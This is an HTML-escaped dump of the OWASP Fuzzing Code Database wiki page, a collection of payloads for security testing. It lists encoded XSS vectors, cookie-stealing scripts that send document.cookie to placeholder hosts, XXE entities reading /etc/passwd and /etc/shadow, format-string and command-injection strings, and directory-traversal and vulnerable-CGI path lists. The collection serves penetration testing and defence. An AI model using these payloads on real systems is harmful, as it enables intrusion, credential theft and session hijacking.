&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80291</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80291"/>
				<updated>2010-03-22T12:13:48Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (18 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (18 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (17 March, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
index.shtml&lt;br /&gt;
x.htw&lt;br /&gt;
x.ida&lt;br /&gt;
x.idq&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
